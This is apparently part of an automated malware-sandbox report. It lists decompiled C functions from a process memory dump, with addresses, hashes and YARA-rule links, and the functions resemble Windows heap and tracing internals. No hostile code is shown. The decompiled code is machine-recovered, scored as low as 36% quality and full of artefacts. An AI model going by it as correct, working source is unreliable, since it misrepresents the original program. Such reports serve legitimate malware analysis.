                                                      C-Code - Quality: 43%
                                                      			E049D8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x49fd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04927D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0494B640(E04949AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                      0x049d8d34
                                                      0x049d8d43
                                                      0x049d8d4b
                                                      0x049d8d4e
                                                      0x049d8d52
                                                      0x049d8d5c
                                                      0x049d8d6e
                                                      0x049d8d5e
                                                      0x049d8d67
                                                      0x049d8d67
                                                      0x049d8d79
                                                      0x049d8d7a
                                                      0x049d8d7c
                                                      0x049d8d81
                                                      0x049d8d94

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a32200f5d1db37fafd371ca51d33fc4b9b2825e4cd18ef28b0b6e12be10f761
                                                      • Instruction ID: c661cac7567d3351929d2e5dfd84b04d4f529725419b7938429c2c7a1df23f4a
                                                      • Opcode Fuzzy Hash: 2a32200f5d1db37fafd371ca51d33fc4b9b2825e4cd18ef28b0b6e12be10f761
                                                      • Instruction Fuzzy Hash: 53F0B470E0460C9FDB14EFB8D541F6E77B4EF44704F5080A9E916EB281EA34E900C754
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0494927A, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E0494927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04924620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0494FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E049492C6(_t11, _t14);
				}
				return _t11;
			}





                                                      0x04949295
                                                      0x04949299
                                                      0x0494929f
                                                      0x049492aa
                                                      0x049492ad
                                                      0x049492ae
                                                      0x049492af
                                                      0x049492b0
                                                      0x049492b4
                                                      0x049492bb
                                                      0x049492bb
                                                      0x049492c5

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction ID: da2391e53216dd39d862e9f5ae194a2f5dc7aea6ef1da2267856451d5ebee818
                                                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction Fuzzy Hash: 77E09272340A406BF7219E5ADC94F5777ADEFC2725F044079B9045F286CAE6ED098BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D8CD6, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 36%
                                                      			E049D8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x49fd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04927D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0494B640(E04949AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                      0x049d8ce5
                                                      0x049d8ced
                                                      0x049d8cf0
                                                      0x049d8cfb
                                                      0x049d8d0d
                                                      0x049d8cfd
                                                      0x049d8d06
                                                      0x049d8d06
                                                      0x049d8d18
                                                      0x049d8d19
                                                      0x049d8d1b
                                                      0x049d8d20
                                                      0x049d8d33

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b2aa4831e057a4f94b000bd4cea20735aa868f1d390d1fc6571638d0c4edc91
                                                      • Instruction ID: 48c1d5ad51bd29f03d2766639ac3a9085d879507b04cde5df8ac22b63667a601
                                                      • Opcode Fuzzy Hash: 2b2aa4831e057a4f94b000bd4cea20735aa868f1d390d1fc6571638d0c4edc91
                                                      • Instruction Fuzzy Hash: 3EF08270A04208ABDB04EBB8D945E6E77B8EF88304F5041A9F916EB2C1EA34E900C754
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0492746D, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E0492746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0491EB70(__ecx, 0x49f79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E049495D0();
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                      0x0492746d
                                                      0x0492746d
                                                      0x0492746d
                                                      0x04927471
                                                      0x04927488
                                                      0x0496f92d
                                                      0x0492748e
                                                      0x04927491
                                                      0x04927495
                                                      0x0496f937
                                                      0x0496f93a
                                                      0x0496f94e
                                                      0x0496f953
                                                      0x0496f956
                                                      0x0496f956
                                                      0x04927495
                                                      0x00000000
                                                      0x04927488
                                                      0x04927473
                                                      0x04927478
                                                      0x0492747d
                                                      0x04927481
                                                      0x00000000
                                                      0x04927481
                                                      0x0492747d
                                                      0x0492747a
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91100f858a82c2340aa5719297f3d64dfa465013118e8e29738dbf0ddb36455c
                                                      • Instruction ID: c7b98fd3341ee35e183452d363f83f3e8886a1a6e5ff06bc9bd5e8b089674d10
                                                      • Opcode Fuzzy Hash: 91100f858a82c2340aa5719297f3d64dfa465013118e8e29738dbf0ddb36455c
                                                      • Instruction Fuzzy Hash: 3CF0B434A54965BADF019BE8CA40F797B67AF44358F040AB5D851B7168F724B8008789
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04904F2E, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04904F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E049D88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0492C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x48e1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                      0x04904f2e
                                                      0x04904f34
                                                      0x04904f38
                                                      0x04960b85
                                                      0x04960b85
                                                      0x04960b89
                                                      0x04960b9a
                                                      0x04960b9a
                                                      0x04960b9f
                                                      0x00000000
                                                      0x04960b9f
                                                      0x04960b94
                                                      0x04960b98
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04960b98
                                                      0x04904f3e
                                                      0x04904f48
                                                      0x00000000
                                                      0x04904f6e
                                                      0x00000000
                                                      0x04904f70

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0803512bb881c09017f45406d81bd99cdb144fc8918cef9b326b69276560a28f
                                                      • Instruction ID: 1c6d72be8a074d7f1ad1e73d2a97feff9225e4a198c37a03d27ae9dd13b0dabc
                                                      • Opcode Fuzzy Hash: 0803512bb881c09017f45406d81bd99cdb144fc8918cef9b326b69276560a28f
                                                      • Instruction Fuzzy Hash: 94F0BE329656948FEB61DB28C184B26B7DCAB017B8F048474D40787921C724F884C644
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D8B58, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 36%
                                                      			E049D8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x49fd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04927D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0494B640(E04949AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                      0x049d8b67
                                                      0x049d8b6f
                                                      0x049d8b72
                                                      0x049d8b7d
                                                      0x049d8b8f
                                                      0x049d8b7f
                                                      0x049d8b88
                                                      0x049d8b88
                                                      0x049d8b9a
                                                      0x049d8b9b
                                                      0x049d8b9d
                                                      0x049d8ba2
                                                      0x049d8bb5

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2342ef1be181c4d67dc190410d0b3d39360950791218668103300c3bc257d6fa
                                                      • Instruction ID: de4fcde2de3c65382e4d1dcfeac17022db1d2a94fb36e3be59de3f6072e09957
                                                      • Opcode Fuzzy Hash: 2342ef1be181c4d67dc190410d0b3d39360950791218668103300c3bc257d6fa
                                                      • Instruction Fuzzy Hash: 1CF089B0A042589FDB14EBB4D505E7E77B4EF44304F440469B915DB3C1EA74E900C754
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493A44B, Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0493A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x49f7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04924620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0494FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                      0x0493a44b
                                                      0x0493a453
                                                      0x0493a472
                                                      0x0493a476
                                                      0x00000000
                                                      0x0493a493
                                                      0x0493a47a
                                                      0x0493a47f
                                                      0x0493a486
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 510ae41db70639d259f84c64ee4c932270538ead22162ab9a8eef766f0efa8c0
                                                      • Instruction ID: fa7f1f9f2e48655d90d45ac51fc18b0d32ad8abe59653459ffcd3eb8282862d7
                                                      • Opcode Fuzzy Hash: 510ae41db70639d259f84c64ee4c932270538ead22162ab9a8eef766f0efa8c0
                                                      • Instruction Fuzzy Hash: 8AE09272A01421ABE2119B59EC04F6673AEDBD5656F094439E544C7254E628ED01C7E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0490F358, Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E0490F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0493F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04924620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                      0x0490f35d
                                                      0x0490f361
                                                      0x0490f367
                                                      0x0490f372
                                                      0x0490f38c
                                                      0x0490f38c
                                                      0x0490f394

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction ID: 11274d0af3ff2321128b9804bc9ce001183bd673a52dee5cabb2fa96928bca50
                                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction Fuzzy Hash: 9AE0D833A40218BFDB31A6D99E05F5ABBACDB84BA1F004165B904D7194D560AE00C6D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491FF60, Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0491FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x48e11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E049D88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04920050(_t14);
				}
			}










                                                      0x0491ff66
                                                      0x0491ff6b
                                                      0x00000000
                                                      0x0491ff8f
                                                      0x00000000
                                                      0x0491ff8f

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 992149f09233a70e54f8854c75cce9b46a6a2d04a56ade44b68ff6d957e69200
                                                      • Instruction ID: 96acaf41ec34c106529824490e4d5526277151a1f0b3f63785c839eb5470bc76
                                                      • Opcode Fuzzy Hash: 992149f09233a70e54f8854c75cce9b46a6a2d04a56ade44b68ff6d957e69200
                                                      • Instruction Fuzzy Hash: 23E0DFB068920D9FE734DF52D140F293B9CBB82725F19843DF00A4B226C662F880C206
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049941E8, Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E049941E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x49e08f0);
				_t5 = E0495D08C(__ebx, __edi, __esi);
				if( *0x49f87ec == 0) {
					E0491EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x49f87ec == 0) {
						 *0x49f87f0 = 0x49f87ec;
						 *0x49f87ec = 0x49f87ec;
						 *0x49f87e8 = 0x49f87e4;
						 *0x49f87e4 = 0x49f87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04994248();
				}
				return E0495D0D1(_t5);
			}





                                                      0x049941e8
                                                      0x049941ea
                                                      0x049941ef
                                                      0x049941fb
                                                      0x04994206
                                                      0x0499420b
                                                      0x04994216
                                                      0x0499421d
                                                      0x04994222
                                                      0x0499422c
                                                      0x04994231
                                                      0x04994231
                                                      0x04994236
                                                      0x0499423d
                                                      0x0499423d
                                                      0x04994247

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3154360937a484edbbe132a1958011746c836520ea52c2238947c836ef75ad55
                                                      • Instruction ID: 67cc67c1238cb6867cbf7fdf3532070dd947b338839e81897aff9ec598aac501
                                                      • Opcode Fuzzy Hash: 3154360937a484edbbe132a1958011746c836520ea52c2238947c836ef75ad55
                                                      • Instruction Fuzzy Hash: F8F01574929B04CFEBE1FFABA5047183AE4F7C4328F10813AC10087A94C7786982CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049BD380, Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E049BD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0490E8B0(__ecx, _a4, 0xfff);
					L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                      0x049bd38a
                                                      0x049bd39b
                                                      0x049bd3b1
                                                      0x00000000
                                                      0x049bd3b6
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction ID: 9aa7dae77f0dc6b8b6bd073672492c03a296031bda9c09ea1a704eb301b928c0
                                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction Fuzzy Hash: E3E0C231280714BBEB225E44CD00FA97B1ADB907A8F104431FE486A691C679BC91E6C4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493A185, Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0493A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x49f67e4 >= 0xa) {
					if(_t5 < 0x49f6800 || _t5 >= 0x49f6900) {
						return L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04920010(0x49f67e0, _t5);
				}
			}





                                                      0x0493a190
                                                      0x0493a1a6
                                                      0x0493a1c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0493a192
                                                      0x0493a192
                                                      0x0493a19f
                                                      0x0493a19f

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e0da1fe44c8ca5899e473657ad750ac8689079af09d8aa88b3c2922178e66ae
                                                      • Instruction ID: d1d1335d99262465c2a5367b9f00b720d35c5939e6ff5351d7bb059e3eaca8f5
                                                      • Opcode Fuzzy Hash: 7e0da1fe44c8ca5899e473657ad750ac8689079af09d8aa88b3c2922178e66ae
                                                      • Instruction Fuzzy Hash: 4ED02E211603003AF62C2790AE14F212292E7C1709F300C3CF3832A9A8DA60FCD2C309
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049316E0, Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E049316E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04931710(0x49f67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04924620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                      0x049316e8
                                                      0x049316ef
                                                      0x049316f3
                                                      0x049316fe
                                                      0x00000000
                                                      0x04931700
                                                      0x0493170d
                                                      0x0493170d
                                                      0x049316f2
                                                      0x049316f2
                                                      0x049316f2
                                                      0x049316f2

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c5261ba5974f3472ed6b9f17c9df84f96bb046b7d70aa21ecfda6679041b32e3
                                                      • Instruction ID: 154903e3675a3790246b3adbaa6e1cac48507fa903af4ef91c386bfe3d83994d
                                                      • Opcode Fuzzy Hash: c5261ba5974f3472ed6b9f17c9df84f96bb046b7d70aa21ecfda6679041b32e3
                                                      • Instruction Fuzzy Hash: 02D0A73110030052FA2D5B119C05B143255DBC178EF38007CF207594E0CFA0FD92E548
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049853CA, Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E049853CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0491EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                      0x049853ca
                                                      0x049853ce
                                                      0x049853d9
                                                      0x049853de
                                                      0x049853e1
                                                      0x049853e1
                                                      0x049853e6
                                                      0x049853f3
                                                      0x00000000
                                                      0x049853f8
                                                      0x049853fb

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                      • Instruction ID: 4077691415b0db1e504b50de216facd95f4092514d6548713f0fb57f64ee22d7
                                                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                      • Instruction Fuzzy Hash: 81E0EC76944684EFDF12EB99CA50F5EB7F9FB84B50F150469A4086B661C664FD00CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049335A1, Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E049335A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0491EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                      0x049335a1
                                                      0x049335a1
                                                      0x049335a5
                                                      0x049335ab
                                                      0x049335ab
                                                      0x049335b5
                                                      0x00000000
                                                      0x049335c1
                                                      0x049335b7

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                      • Instruction ID: 95abd5ccdb1d0d50b540b1650d710689012d11d00a638ac45975e9510a51dfa0
                                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                      • Instruction Fuzzy Hash: 10D0A9319C11849EEB21AB10C218B6833F6BB4230AF5820759C0A069A2C33A6A0AD600
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491AAB0, Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0491AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                      0x0491aab6
                                                      0x0491aabb
                                                      0x0496a442
                                                      0x00000000
                                                      0x0496a448
                                                      0x0496a454
                                                      0x0496a454
                                                      0x0491aac1
                                                      0x0491aac1
                                                      0x0491aac6
                                                      0x0491aac6

